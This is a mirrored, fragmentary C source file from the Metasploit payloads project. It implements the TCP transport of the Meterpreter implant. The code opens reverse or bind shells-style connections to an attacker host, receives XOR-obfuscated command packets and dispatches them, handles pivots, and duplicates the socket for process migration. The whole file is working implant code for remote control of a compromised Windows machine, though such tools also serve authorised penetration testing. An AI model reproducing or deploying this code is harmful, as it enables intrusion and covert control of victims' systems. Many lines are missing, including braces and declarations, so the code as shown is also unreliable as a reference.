mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00

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* @file server_transport_tcp.c
#include "metsrv.h"
#include <ws2tcpip.h>
#include "packet_encryption.h"
#include "pivot_packet_dispatch.h"
// TCP-transport specific migration stub.
// These fields aren't defined unless the SDK version is set to something old enough.
// So we define them here instead of dancing with SDK versions, allowing us to move on
// and still support older versions of Windows.
#ifndef IPPROTO_IPV6
#define IPPROTO_IPV6 41
* @brief Perform the reverse_tcp connect.
* @param reverseSocket The existing socket that refers to the remote host connection, closed on failure.
* @param sockAddr The SOCKADDR structure which contains details of the connection.
* @param sockAddrSize The size of the \c sockAddr structure.
* @param retryTotal The number of seconds to continually retry for.
* @param retryWait The number of seconds between each connect attempt.
* @return Indication of success or failure.
static DWORD reverse_tcp_run(SOCKET reverseSocket, SOCKADDR* sockAddr, int sockAddrSize, DWORD retryTotal, DWORD retryWait)
int start = current_unix_timestamp();
int retryStart = current_unix_timestamp();
if ((result = connect(reverseSocket, sockAddr, sockAddrSize)) != SOCKET_ERROR)
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
if (result == SOCKET_ERROR)
return result;
* @brief Connects to a provided host/port (IPv4), downloads a payload and executes it.
* @param host String containing the name or IP of the host to connect to.
* @param port Port number to connect to.
* @param retryTotal The number of seconds to continually retry for.
* @param retryWait The number of seconds between each connect attempt.
* @return Indication of success or failure.
static DWORD reverse_tcp4(const char* host, u_short port, DWORD retryTotal, DWORD retryWait, SOCKET* socketBuffer)
*socketBuffer = 0;
// start by attempting to fire up Winsock.
WSADATA wsaData = { 0 };
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
return WSAGetLastError();
// prepare to connect to the attacker
struct hostent* target = gethostbyname(host);
char* targetIp = inet_ntoa(*(struct in_addr *)*target->h_addr_list);
SOCKADDR_IN sock = { 0 };
sock.sin_addr.s_addr = inet_addr(targetIp);
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
DWORD result = reverse_tcp_run(socketHandle, (SOCKADDR*)&sock, sizeof(sock), retryTotal, retryWait);
if (result == ERROR_SUCCESS)
*socketBuffer = socketHandle;
return result;
* @brief Connects to a provided host/port (IPv6), downloads a payload and executes it.
* @param host String containing the name or IP of the host to connect to.
* @param service The target service/port.
* @param scopeId IPv6 scope ID.
* @param retryTotal The number of seconds to continually retry for.
* @param retryWait The number of seconds between each connect attempt.
* @return Indication of success or failure.
static DWORD reverse_tcp6(const char* host, const char* service, ULONG scopeId, DWORD retryTotal, DWORD retryWait, SOCKET* socketBuffer)
*socketBuffer = 0;
// start by attempting to fire up Winsock.
WSADATA wsaData = { 0 };
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
return WSAGetLastError();
ADDRINFO hints = { 0 };
hints.ai_family = AF_INET6;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
LPADDRINFO addresses;
if (getaddrinfo(host, service, &hints, &addresses) != 0)
return WSAGetLastError();
// prepare to connect to the attacker
if (socketHandle == INVALID_SOCKET)
dprintf("[STAGELESS IPV6] failed to connect to attacker");
return WSAGetLastError();
int start = current_unix_timestamp();
int retryStart = current_unix_timestamp();
for (LPADDRINFO address = addresses; address != NULL; address = address->ai_next)
((LPSOCKADDR_IN6)address->ai_addr)->sin6_scope_id = scopeId;
if ((result = connect(socketHandle, address->ai_addr, (int)address->ai_addrlen)) != SOCKET_ERROR)
dprintf("[STAGELESS IPV6] Socket successfully connected");
*socketBuffer = socketHandle;
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
return result;
* @brief Perform the bind_tcp process.
* @param listenSocket The existing listen socket that refers to the remote host connection, closed before returning.
* @param sockAddr The SOCKADDR structure which contains details of the connection.
* @param sockAddrSize The size of the \c sockAddr structure.
* @param acceptSocketBuffer Buffer that will receive the accepted socket handle on success.
* @return Indication of success or failure.
static DWORD bind_tcp_run(SOCKET listenSocket, SOCKADDR* sockAddr, int sockAddrSize, SOCKET* acceptSocketBuffer)
if (bind(listenSocket, sockAddr, sockAddrSize) == SOCKET_ERROR)
result = WSAGetLastError();
if (listen(listenSocket, 1) == SOCKET_ERROR)
result = WSAGetLastError();
// Setup, ready to go, now wait for the connection.
SOCKET acceptSocket = accept(listenSocket, NULL, NULL);
if (acceptSocket == INVALID_SOCKET)
result = WSAGetLastError();
*acceptSocketBuffer = acceptSocket;
} while (0);
return result;
* @brief Listens on a port for an incoming payload request.
* @param port Port number to listen on.
* @param socketBuffer Pointer to the variable that will recieve the socket file descriptor.
* @return Indication of success or failure.
static DWORD bind_tcp(u_short port, SOCKET* socketBuffer)
*socketBuffer = 0;
// start by attempting to fire up Winsock.
WSADATA wsaData = { 0 };
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
return WSAGetLastError();
// prepare a connection listener for the attacker to connect to, and we
// attempt to bind to both ipv6 and ipv4 by default, and fallback to ipv4
// only if the process fails.
BOOL v4Fallback = FALSE;
if (listenSocket == INVALID_SOCKET)
dprintf("[BIND] Unable to create IPv6 socket");
v4Fallback = TRUE;
int no = 0;
if (setsockopt(listenSocket, IPPROTO_IPV6, IPV6_V6ONLY, (char*)&no, sizeof(no)) == SOCKET_ERROR)
// fallback to ipv4 - we're probably running on Windows XP or earlier here, which means that to
// support IPv4 and IPv6 we'd need to create two separate sockets. IPv6 on XP isn't that common
// so instead, we'll just revert back to v4 and listen on that one address instead.
dprintf("[BIND] Unable to remove IPV6_ONLY option");
v4Fallback = TRUE;
if (v4Fallback)
dprintf("[BIND] Falling back to IPV4");
listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
struct sockaddr_in6 sockAddr = { 0 };
if (v4Fallback)
struct sockaddr_in* v4Addr = (struct sockaddr_in*)&sockAddr;
v4Addr->sin_addr.s_addr = htons(INADDR_ANY);
v4Addr->sin_family = AF_INET;
v4Addr->sin_port = htons(port);
sockAddr.sin6_addr = in6addr_any;
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(port);
return bind_tcp_run(listenSocket, (SOCKADDR*)&sockAddr, v4Fallback ? sizeof(struct sockaddr_in) : sizeof(struct sockaddr_in6), socketBuffer);
* @brief Poll a socket for data to recv and block when none available.
* @param remote Pointer to the remote instance.
* @param timeout Amount of time to wait before the poll times out (in milliseconds).
* @return Indication of success or failure.
static LONG server_socket_poll(Remote* remote, long timeout)
TcpTransportContext* ctx = (TcpTransportContext*)remote->transport->ctx;
struct timeval tv;
LONG result;
fd_set fdread;
FD_SET(ctx->fd, &fdread);
tv.tv_sec = 0;
tv.tv_usec = timeout;
result = select((int)ctx->fd + 1, &fdread, NULL, NULL, &tv);
return result;
* @brief Receive a new packet on the given remote endpoint.
* @param remote Pointer to the \c Remote instance.
* @param packet Pointer to a pointer that will receive the \c Packet data.
* @return An indication of the result of processing the transmission request.
static DWORD packet_receive(Remote *remote, Packet **packet)
DWORD headerBytes = 0, payloadBytesLeft = 0, res;
Packet *localPacket = NULL;
PacketHeader header = { 0 };
int bytesRead;
BOOL inHeader = TRUE;
PUCHAR packetBuffer = NULL;
ULONG payloadLength;
TcpTransportContext* ctx = (TcpTransportContext*)remote->transport->ctx;
dprintf("[TCP PACKET RECEIVE] reading in the header");
// Read the packet length
while (inHeader)
if ((bytesRead = recv(ctx->fd, ((PCHAR)&header + headerBytes), sizeof(PacketHeader)-headerBytes, 0)) <= 0)
goto out;
headerBytes += bytesRead;
if (headerBytes != sizeof(PacketHeader))
inHeader = FALSE;
if (headerBytes != sizeof(PacketHeader))
dprintf("[TCP] we didn't get enough header bytes");
goto out;
dprintf("[TCP] the XOR key is: %02x%02x%02x%02x", header.xor_key[0], header.xor_key[1], header.xor_key[2], header.xor_key[3]);
PUCHAR h = (PUCHAR)&header;
vdprintf("[TCP] Packet header: [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X]",
h[0], h[1], h[2], h[3], h[4], h[5], h[6], h[7], h[8], h[9], h[10], h[11], h[12], h[13], h[14], h[15], h[16], h[17], h[18], h[19], h[20], h[21], h[22], h[23], h[24], h[25], h[26], h[27], h[28], h[29], h[30], h[31]);
// At this point, we might have read in a valid TLV packet, or we might have read in the first chunk of data
// from a staged listener after a reconnect. We can figure this out rather lazily by assuming the following:
// XOR keys are always 4 bytes that are non-zero. If the higher order byte of the xor key is zero, then it
// isn't an XOR Key, instead it's the 4-byte length of the metsrv binary (because metsrv isn't THAT big).
if (header.xor_key[3] == 0)
// looks like we have a metsrv instance, time to ignore it.
int length = *(int*)&header.xor_key[0];
dprintf("[TCP] discovered a length header, assuming it's metsrv of length %d", length);
int bytesToRead = length - sizeof(PacketHeader) + sizeof(DWORD);
char buffer[65535];
while (bytesToRead > 0)
int bytesRead = recv(ctx->fd, buffer, min(sizeof(buffer), bytesToRead), 0);
if (bytesRead < 0)
if (GetLastError() == WSAEWOULDBLOCK)
bytesToRead -= bytesRead;
// did something go wrong.
if (bytesToRead > 0)
goto out;
// indicate success, but don't return a packet for processing
*packet = NULL;
vdprintf("[TCP] XOR key looks fine, moving on");
PacketHeader encodedHeader;
memcpy(&encodedHeader, &header, sizeof(PacketHeader));
// xor the header data
xor_bytes(header.xor_key, (PUCHAR)&header + sizeof(header.xor_key), sizeof(PacketHeader) - sizeof(header.xor_key));
PUCHAR h = (PUCHAR)&header;
vdprintf("[TCP] Packet header: [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X] [0x%02X 0x%02X 0x%02X 0x%02X]",
h[0], h[1], h[2], h[3], h[4], h[5], h[6], h[7], h[8], h[9], h[10], h[11], h[12], h[13], h[14], h[15], h[16], h[17], h[18], h[19], h[20], h[21], h[22], h[23], h[24], h[25], h[26], h[27], h[28], h[29], h[30], h[31]);
payloadLength = ntohl(header.length) - sizeof(TlvHeader);
vdprintf("[TCP] Payload length is %d", payloadLength);
DWORD packetSize = sizeof(PacketHeader) + payloadLength;
vdprintf("[TCP] total buffer size for the packet is %d", packetSize);
payloadBytesLeft = payloadLength;
// Allocate the payload
if (!(packetBuffer = (PUCHAR)malloc(packetSize)))
dprintf("[TCP] Failed to create the packet buffer");
goto out;
dprintf("[TCP] Allocated packet buffer at %p", packetBuffer);
// Copy the packet header stuff over to the packet
memcpy_s(packetBuffer, sizeof(PacketHeader), (LPBYTE)&encodedHeader, sizeof(PacketHeader));
LPBYTE payload = packetBuffer + sizeof(PacketHeader);
// Read the payload
while (payloadBytesLeft > 0)
if ((bytesRead = recv(ctx->fd, (PCHAR)(payload + payloadLength - payloadBytesLeft), payloadBytesLeft, 0)) <= 0)
if (GetLastError() == WSAEWOULDBLOCK)
if (bytesRead < 0)
goto out;
payloadBytesLeft -= bytesRead;
// Didn't finish?
if (payloadBytesLeft)
dprintf("[TCP] Failed to get all the payload bytes");
goto out;
h = (PUCHAR)&header.session_guid[0];
dprintf("[TCP] Packet Session GUID: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X",
h[0], h[1], h[2], h[3], h[4], h[5], h[6], h[7], h[8], h[9], h[10], h[11], h[12], h[13], h[14], h[15]);
if (is_null_guid(header.session_guid) || memcmp(remote->orig_config->session.session_guid, header.session_guid, sizeof(header.session_guid)) == 0)
dprintf("[TCP] Session GUIDs match (or packet guid is null), decrypting packet");
SetLastError(decrypt_packet(remote, packet, packetBuffer, packetSize));
dprintf("[TCP] Session GUIDs don't match, looking for a pivot");
PivotContext* pivotCtx = pivot_tree_find(remote->pivot_sessions, header.session_guid);
if (pivotCtx != NULL)
dprintf("[TCP] Pivot found, dispatching packet on a thread (to avoid main thread blocking)");
SetLastError(pivot_packet_dispatch(pivotCtx, packetBuffer, packetSize));
// mark this packet buffer as NULL as the thread will clean it up
packetBuffer = NULL;
*packet = NULL;
dprintf("[TCP] Session GUIDs don't match, can't find pivot!");
res = GetLastError();
dprintf("[TCP] Freeing stuff up");
// Cleanup on failure
if (res != ERROR_SUCCESS)
dprintf("[TCP] Packet receive finished");
return res;
* @brief The servers main dispatch loop for incoming requests using TCP
* @param remote Pointer to the remote endpoint for this server connection.
* @param dispatchThread Pointer to the main dispatch thread.
* @returns Indication of success or failure.
static DWORD server_dispatch_tcp(Remote* remote, THREAD* dispatchThread)
Transport* transport = remote->transport;
BOOL running = TRUE;
Packet * packet = NULL;
THREAD * cpt = NULL;
dprintf("[DISPATCH] entering server_dispatch( 0x%08X )", remote);
int lastPacket = current_unix_timestamp();
while (running)
if (event_poll(dispatchThread->sigterm, 0))
dprintf("[DISPATCH] server dispatch thread signaled to terminate...");
result = server_socket_poll(remote, 50000);
if (result > 0)
result = packet_receive(remote, &packet);
if (result != ERROR_SUCCESS)
dprintf("[DISPATCH] packet_receive returned %d, exiting dispatcher...", result);
if (packet == NULL)
dprintf("[DISPATCH] No packet received, probably just metsrv being ignored or a pivot packet being handled.");
running = command_handle(remote, packet);
dprintf("[DISPATCH] command_process result: %s", (running ? "continue" : "stop"));
// packet received, reset the timer
lastPacket = current_unix_timestamp();
else if (result == 0)
// check if the communication has timed out, or the session has expired, so we should terminate the session
int now = current_unix_timestamp();
if (remote->sess_expiry_end && now > remote->sess_expiry_end)
dprintf("[DISPATCH] session has ended");
else if ((now - lastPacket) > transport->timeouts.comms)
dprintf("[DISPATCH] communications has timed out");
dprintf("[DISPATCH] server_socket_poll returned %d, exiting dispatcher...", result);
dprintf("[DISPATCH] leaving server_dispatch.");
return result;
* @brief Get the socket from the transport (if it's TCP).
* @param transport Pointer to the TCP transport containing the socket.
* @return The current transport socket FD, if any, or zero.
static UINT_PTR transport_get_handle_tcp(Transport* transport)
if (transport && transport->type == METERPRETER_TRANSPORT_TCP)
return (UINT_PTR)((TcpTransportContext*)transport->ctx)->fd;
return 0;
* @brief Set the socket from the transport (if it's TCP).
* @param transport Pointer to the TCP transport containing the socket.
* @param handle The current transport socket FD, if any.
static void transport_set_handle_tcp(Transport* transport, UINT_PTR handle)
if (transport && transport->type == METERPRETER_TRANSPORT_TCP)
((TcpTransportContext*)transport->ctx)->fd = (SOCKET)handle;
* @brief Destroy the TCP transport.
* @param transport Pointer to the TCP transport to destroy.
static void transport_destroy_tcp(Transport* transport)
if (transport && transport->type == METERPRETER_TRANSPORT_TCP)
dprintf("[TRANS TCP] Destroying tcp transport for url %S", transport->url);
* @brief Handle cleaning up on the client socket when MSF terminates the connection.
* @param thread Pointer to the thread instance.
* @return EXIT_SUCCESS
DWORD THREADCALL cleanup_socket(THREAD* thread)
char buf[4];
int result;
SOCKET fd = (SOCKET)thread->parameter1;
dprintf("[TCP] waiting for disconnect from remote");
// loop until FD_CLOSE comes through.
while ((result = recv(fd, buf, sizeof(buf), 0)) != 0)
if (result <= 0)
dprintf("[TCP] disconnect received, cleaning up");
* @brief Reset the given TCP connection.
* @param transport Pointer to the TCP transport to reset.
* @param shuttingDown Indication that the Metsrv instance is terminating completely.
static void transport_reset_tcp(Transport* transport, BOOL shuttingDown)
if (transport && transport->type == METERPRETER_TRANSPORT_TCP)
TcpTransportContext* ctx = (TcpTransportContext*)transport->ctx;
dprintf("[TCP] Resetting transport from %u", ctx->fd);
if (ctx->fd)
if (shuttingDown)
dprintf("[TCP] Transport is shutting down");
// we can terminate right here, given that we're closing up
// Thanks to the fact that we know we can't rely on Windows to flush the socket nicely
// we can't just call "closesocket" on the socket. If we do, we could lose packets that
// cause MSF to be rather unhappy (and it hangs as a result of not getting a response).
// Instead of this, we create a new thread which monitors the socket handle. We know that
// MSF will terminate that connection when resetting, and so we wait for that termination
// before cleaning up the socket. This is done in another thread so that functionality
// can continue.
dprintf("[TCP] It should now be safe to close the socket.");
THREAD* t = thread_create(cleanup_socket, (LPVOID)ctx->fd, NULL, NULL);
ctx->fd = 0;
dprintf("[TCP] Transport 0x%p is now reset to %u", transport, ctx->fd);
* @brief Configure the TCP connnection. If it doesn't exist, go ahead and estbalish it.
* @param transport Pointer to the transport instance.
* @return Indication of success or failure.
static DWORD configure_tcp_connection(Transport* transport)
size_t charsConverted;
char asciiUrl[512];
TcpTransportContext* ctx = (TcpTransportContext*)transport->ctx;
// check if comms is already open via a staged payload
if (ctx->fd)
dprintf("[TCP] Connection already running on %u", ctx->fd);
// From here, we need to establish comms a-la stageless.
wcstombs_s(&charsConverted, asciiUrl, sizeof(asciiUrl), transport->url, sizeof(asciiUrl)-1);
dprintf("[TCP CONFIGURE] Url: %S", transport->url);
//transport->start_time = current_unix_timestamp();
transport->comms_last_packet = current_unix_timestamp();
if (strncmp(asciiUrl, "tcp", 3) == 0)
char* pHost = strstr(asciiUrl, "//") + 2;
char* pPort = strrchr(pHost, ':') + 1;
// check if we're using IPv6
if (asciiUrl[3] == '6')
char* pScopeId = strrchr(pHost, '?') + 1;
*(pScopeId - 1) = '\0';
*(pPort - 1) = '\0';
dprintf("[STAGELESS] IPv6 host %s port %S scopeid %S", pHost, pPort, pScopeId);
result = reverse_tcp6(pHost, pPort, atol(pScopeId), transport->timeouts.retry_total,
transport->timeouts.retry_wait, &ctx->fd);
u_short usPort = (u_short)atoi(pPort);
// if no host is specified, then we can assume that this is a bind payload, otherwise
// we'll assume that the payload is a reverse_tcp one and the given host is valid
if (*pHost == ':')
dprintf("[STAGELESS] IPv4 bind port %s", pPort);
result = bind_tcp(usPort, &ctx->fd);
*(pPort - 1) = '\0';
dprintf("[STAGELESS] IPv4 host %s port %s", pHost, pPort);
result = reverse_tcp4(pHost, usPort, transport->timeouts.retry_total,
transport->timeouts.retry_wait, &ctx->fd);
if (result != ERROR_SUCCESS)
dprintf("[SERVER] Something went wrong %u", result);
dprintf("[SERVER] Looking good, FORWARD!");
// Do not allow the file descriptor to be inherited by child processes
SetHandleInformation((HANDLE)ctx->fd, HANDLE_FLAG_INHERIT, 0);
transport->comms_last_packet = current_unix_timestamp();
return result;
* @brief Transmit a packet via TCP.
* @param remote Pointer to the \c Remote instance.
* @param rawPacket Pointer to the raw packet bytes to send.
* @param rawPacketLength Length of the raw packet data.
* @return An indication of the result of processing the transmission request.
DWORD packet_transmit_tcp(Remote* remote, LPBYTE rawPacket, DWORD rawPacketLength)
TcpTransportContext* ctx = (TcpTransportContext*)remote->transport->ctx;
DWORD idx = 0;
while (idx < rawPacketLength)
result = send(ctx->fd, (PCHAR)(rawPacket + idx), rawPacketLength - idx, 0);
if (result < 0)
dprintf("[PACKET] send failed: %d", result);
idx += result;
result = GetLastError();
if (result != ERROR_SUCCESS)
dprintf("[PACKET] transmit packet failed with return %d at index %d\n", result, idx);
dprintf("[PACKET] Packet sent!");
return result;
* @brief Create a configuration block from the given transport.
* @param transport Transport data to create the configuration from.
* @return config Pointer to the config block to write to.
void transport_write_tcp_config(Transport* transport, MetsrvTransportTcp* config)
if (transport && config)
config->common.comms_timeout = transport->timeouts.comms;
config->common.retry_total = transport->timeouts.retry_total;
config->common.retry_wait = transport->timeouts.retry_wait;
wcsncpy(config->common.url, transport->url, URL_SIZE);
* @brief Create a migration context that is specific to this transport type.
* @param transport Transport data to create the configuration from.
* @param targetProcessId ID of the process that we will be migrating into.
* @param targetProcessHandle Handle to the target process.
* @param contextSize Buffer that will receive the size of the generated context.
* @param contextBufer Buffer that will receive the generated context.
* @return Indication of success or failure.
static DWORD get_migrate_context_tcp(Transport* transport, DWORD targetProcessId, HANDLE targetProcessHandle, LPDWORD contextSize, LPBYTE* contextBuffer)
if (ctx == NULL)
// Duplicate the socket for the target process
if (WSADuplicateSocketA(((TcpTransportContext*)transport->ctx)->fd, targetProcessId, &ctx->info) != NO_ERROR)
return WSAGetLastError();
*contextSize = sizeof(TCPMIGRATECONTEXT);
*contextBuffer = (PBYTE)ctx;
* @brief Gets the size of the memory space required to store the configuration for this transport.
* @param t Pointer to the transport.
* @return Size, in bytes of the required memory block.
static DWORD transport_get_config_size_tcp(Transport* t)
return sizeof(MetsrvTransportTcp);
* @brief Creates a new TCP transport instance.
* @param config The TCP configuration block.
* @param size Pointer to the size of the parsed config block.
* @return Pointer to the newly configured/created TCP transport instance.
Transport* transport_create_tcp(MetsrvTransportTcp* config, LPDWORD size)
Transport* transport = (Transport*)malloc(sizeof(Transport));
TcpTransportContext* ctx = (TcpTransportContext*)malloc(sizeof(TcpTransportContext));
if (size)
*size = sizeof(MetsrvTransportTcp);
dprintf("[TRANS TCP] Creating tcp transport for url %S", config->common.url);
memset(transport, 0, sizeof(Transport));
memset(ctx, 0, sizeof(TcpTransportContext));
transport->timeouts.comms = config->common.comms_timeout;
transport->timeouts.retry_total = config->common.retry_total;
transport->timeouts.retry_wait = config->common.retry_wait;
transport->url = _wcsdup(config->common.url);
transport->packet_transmit = packet_transmit_tcp;
transport->transport_init = configure_tcp_connection;
transport->transport_destroy = transport_destroy_tcp;
transport->transport_reset = transport_reset_tcp;
transport->server_dispatch = server_dispatch_tcp;
transport->get_handle = transport_get_handle_tcp;
transport->set_handle = transport_set_handle_tcp;
transport->ctx = ctx;
transport->comms_last_packet = current_unix_timestamp();
transport->get_migrate_context = get_migrate_context_tcp;
transport->get_config_size = transport_get_config_size_tcp;
return transport;